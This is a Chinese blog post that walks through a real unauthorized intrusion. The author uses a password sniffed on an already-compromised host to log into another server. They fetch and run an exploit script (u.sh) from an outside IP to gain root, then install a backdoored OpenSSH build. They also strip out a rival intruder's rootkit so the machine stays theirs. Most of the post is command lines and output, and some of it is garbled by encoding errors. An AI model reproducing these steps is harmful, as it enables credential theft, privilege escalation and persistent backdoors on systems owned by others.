blog:blog.securitycn.net
今天发现台肉鸡上某人ssh连到另外台服务器上记录下了密码
[root@mail ~]# cat /tmp/sshpswd
ldc:[email protected]
直接ssh上去
[root@mail ~]# ssh [email protected]
[email protected]'s password:
Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200
[ldc@localhost ldc]$ cat /etc/issue
Red Hat Enterprise Linux Server release 5 (Tikanga)
Kernel \r _disibledevent=>http://211.100.50.70/u.sh
--13:21:09-- http://211.100.50.70/u.sh
Connecting to 211.100.50.70:80... 宸茶繛鎺ャ?
宸插彂鍑?HTTP 璇锋眰锛屾鍦ㄧ瓑寰呭洖搴?.. 200 OK
闀垮害锛?366 (3.3K) [application/x-sh]
Saving t `u.sh'
100%[=>] 3,366 --.-K/s in 0.04s
13:21:09 (93.7 KB/s) - `u.sh' saved [3366/3366]
[ldc@localhost .v]$ ls
r00t r00t.c u.sh
[ldc@localhost .v]$ chmod +x u.sh
[ldc@localhost .v]$ cat /proc/net/netlink
sk Eth Pid Groups Rmem Wmem Dump Locks
f69f8800 0 2486 00000111 0 0 00000000 2
f7fdae00 0 0 00000000 0 0 00000000 2
c2132200 6 0 00000000 0 0 00000000 2
f6a57a00 7 2143 00000001 0 0 00000000 2
f7caf000 7 0 00000000 0 0 00000000 2
f6a0be00 9 2143 00000000 0 0 00000000 2
f6a61200 9 1996 00000000 0 0 00000000 2
f7de1c00 9 0 00000000 0 0 00000000 2
f7d6ca00 10 0 00000000 0 0 00000000 2
f7fb3200 11 0 00000000 0 0 00000000 2
c2154200 15 476 ffffffff 0 0 00000000 2
f7fdac00 15 0 00000000 0 0 00000000 2
f7fb3000 16 0 00000000 0 0 00000000 2
c21cde00 18 0 00000000 0 0 00000000 2
[ldc@localhost .v]$ ps aux | grep udev
root 477 0.0 0.0 2916 1396 ? S< 12:36 0:00 /sbin/udevd -d
ldc 3462 0.0 0.0 4128 680 pts/0 S 13:00 0:00 grep udev
[ldc@localhost .v]$ sh u.sh 476
suid.c: 鍦ㄥ嚱鏁?鈥榤ain鈥?涓細
suid.c:3: 璀﹀憡锛氶殣寮忓0鏄庝笌鍐呭缓鍑芥暟 鈥榚xecl鈥?涓嶅吋瀹
sh-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:Low-High
已经是root权限了
sh-3.1# w
13:25:18 up 48 min, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ldc pts/0 100.204.107.20 13:05 0.00s 0.12s 0.06s sshd: ldc [priv]
sh-3.1# pwd
/home/ldc/.v
sh-3.1# ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006
我们先留个ssh后门
sh-3.1# wget http://211.100.50.70/openssh4.3p2.tar.gz
--13:32:08-- http://211.100.50.70/openssh4.3p2.tar.gz
Connecting to 211.100.50.70:80... 宸茶繛鎺ャ?
宸插彂鍑?HTTP 璇锋眰锛屾鍦ㄧ瓑寰呭洖搴?.. 200 OK
闀垮害锛?79990 (957K) [application/x-gzip]
Saving t `openssh4.3p2.tar.gz'
100%[=>] 979,990 1.14M/s in 0.8s
13:32:08 (1.14 MB/s) - `openssh4.3p2.tar.gz' saved [979990/979990]
sh-3.1# tar zxf openssh4.3p2.tar.gz
sh-3.1# cd openssh-4.3p2/
sh-3.1# ./configure --prefix=/usr --sysconfdir=/etc/ssh
checking for gcc... gcc
checking for C compiler default output file name... a.out
............(省略若干行)
sh-3.1# make && make
conffile=`echo sshd_config.out | sed 's/.out$//'`; \
/bin/sed -e 's|/etc/ssh/ssh_prng_cmds|/etc/ssh/ssh_prng_cmds|g' -e
............(省略若干行)
sh-3.1# cp ssh_config sshd_config /etc/ssh/
sh-3.1# /etc/rc.d/init.d/sshd restart
鍋滄 sshd锛 [纭畾]
鍚姩 sshd锛 [纭畾]
ok了用我们sshdoor登录
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:Low-High
[root@localhost ~]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:2208 0.0.0.0:* LISTEN 2298/hpiod
tcp 0 0 0.0.0.0:1000 0.0.0.0:* LISTEN 2090/rpc.statd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 2056/portmap
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 2883/vsftpd
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 2315/cupsd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 2361/sendmail: acce
tcp 0 0 127.0.0.1:2207 0.0.0.0:* LISTEN 2303/python
总感觉这系统怪怪连22端口都看不到应该替换了netstat了先看看有没有其他被替换掉系统文件吧
[root@localhost ~]# rpm -qaV
S.5..UG. /bin/netstat
S.5..UG. /sbin/config
S.5....T /usr/bin/ssh-keygen
S.5....T c /etc/sysconfig/system-config-securitylevel
S.5..UG. /usr/sbin/lsof
.M...... /var/tux
S.5....T c /etc/inittab
S.5....T /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_dl14.map
S.5....T /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_ndl14.map
S.5....T /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_dl14.map
S.5....T /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_ndl14.map
S.5....T /usr/share/texmf-var/web2c/aleph.fmt
S.5....T /usr/share/texmf-var/web2c/amstex.fmt
S.5....T /usr/share/texmf-var/web2c/bamstex.fmt
S.5....T /usr/share/texmf-var/web2c/bplain.fmt
S.5....T /usr/share/texmf-var/web2c/cont-en.fmt
S.5....T /usr/share/texmf-var/web2c/etex.fmt
..5....T /usr/share/texmf-var/web2c/metafun.mem
S.5....T /usr/share/texmf-var/web2c/mf.base
..5....T /usr/share/texmf-var/web2c/mpost.mem
S.5....T /usr/share/texmf-var/web2c/mptopdf.fmt
S.5....T /usr/share/texmf-var/web2c/omega.fmt
S.5....T /usr/share/texmf-var/web2c/pdfetex.fmt
S.5....T /usr/share/texmf-var/web2c/pdftex.fmt
S.5....T /usr/share/texmf-var/web2c/tex.fmt
.......T c /etc/kdump.conf
S.5....T c /etc/prcap
..5....T c /etc/pki/nssdb/secmod.db
....L... c /etc/pam.d/system-auth
.M...... c /etc/cups/es.conf
.......T c /etc/audit/auditd.conf
missing /usr/sbin/nscd
S.5....T c /etc/sysconfig/named
.M...... /var/named
SM5..UG. /bin/ps
SM5..UG. /usr/bin/top
SM5....T c /etc/sysconfig/iptables-config
S.5..UG. /usr/bin/find
prelink: /usr/lib/libGL.so.1.2.#prelink#.crFdQJ Could not trace symbol resolving
S.?..... /usr/lib/libGL.so.1.2
S.5....T c /etc/ppp/chap-secrets
S.5....T c /etc/ppp/pap-secrets
S.5....T c /etc/xml/catalog
S.5....T c /usr/share/sgml/docbook/xmlcatalog
S.5....T c /etc/ssh/ssh_config
S.5....T /usr/bin/scp
S.5....T /usr/bin/sftp
S.5....T /usr/bin/ssh
S.5....T /usr/bin/ssh-add
SM5...GT /usr/bin/ssh-agent
S.5....T /usr/bin/ssh-keyscan
S.5....T /usr/share/texmf-var/fonts/map/dvips/updmap/builtin35.map
S.5....T /usr/share/texmf-var/fonts/map/dvips/updmap/download35.map
S.5....T /usr/share/texmf-var/fonts/map/dvips/updmap/ps2pk.map
S.5....T /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_pk.map
S.5....T /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_t1.map
S.5....T /etc/sgml/docbook-slides.cat
S.5....T /usr/share/icons/hicolor/icon-theme.cache
S.5..UG. /bin/ls
S.5..UG. /usr/bin/dir
S.5..UG. /usr/bin/md5sum
S.5..UG. /usr/bin/pstree
S.5....T c /etc/syslog.conf
S.5....T c /etc/ssh/sshd_config
S.5....T /usr/sbin/sshd
missing /var/lib/texmf/ls-R
S.5....T /etc/sgml/docbook-simple.cat
S.5....T c /etc/vsftpd/vsftpd.conf
.M...... /var/ftp/pub
S.5....T c /etc/mailcap
......G. /var/cache/samba/winbindd_privileged
.......T c /etc/mail/sendmail.cf
SM5....T c /etc/mail/submit.cf
S.5....T c /var/log/mail/statistics
..5....T c /usr/lib/security/path.security
S.5....T c /etc/sane.d/dll.conf
还好rpm没替换看来系统好些命令被替换了嘿嘿有同行在啊
不好意思那我就要T你下去了下面先检查下当然这个系统不可靠了我们先替换回可靠命令:
[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir
cp: cannot remove `/usr/bin/dir': Operation not permitted
chattr加了iau了
[root@localhost bin]# chattr -iau /usr/bin/dir
[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir
ok了看看还有什么吧:
[root@localhost chkrootkit-0.48]# lsattr /bin /sbin /usr/bin /usr/sbin /etc| grep -e -ia
s---ia------- /bin/ps
s---ia------- /bin/ls
s---ia------- /bin/netstat
s---ia------- /sbin/config
s---ia------- /sbin/ttymon
s---ia------- /sbin/ttyload
s---ia------- /usr/bin/top
s---ia------- /usr/bin/md5sum
s---ia------- /usr/bin/pstree.x11
s---ia------- /usr/bin/find
s---ia------- /usr/bin/dir
s---ia------- /usr/bin/pstree
s---ia------- /usr/sbin/lsof
s---ia------- /usr/sbin/ttyload
s---ia------- /etc/sh.conf
[root@localhost bin]# chattr -iau ps ls netstat
[root@localhost bin]# rm -rf ps ls netstat
[root@localhost bin]# rz
rz waiting to receive.奫root@localhost bin]# chmod +x ps ls netstat
[root@localhost bin]# chattr +iau ps ls netstat
同样方式把/usr/sbin/lsof、/usr/bin/find等都替换回来
再用netstat看看端口吧:
[root@localhost bin]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:2208 0.0.0.0:* LISTEN 2298/hpiod
tcp 0 0 0.0.0.0:1000 0.0.0.0:* LISTEN 2090/rpc.statd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 2056/portmap
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 2883/vsftpd
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 2315/cupsd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 2361/sendmail: acce
tcp 0 0 0.0.0.0:65530 0.0.0.0:* LISTEN 2663/ttyload (有东东出来了吧)
tcp 0 0 127.0.0.1:2207 0.0.0.0:* LISTEN 2303/python
tcp 0 0 :::22 :::* LISTEN 13935/sshd
现在再用chkrootkit和rkhunter查下看看:
[root@loca
最新评论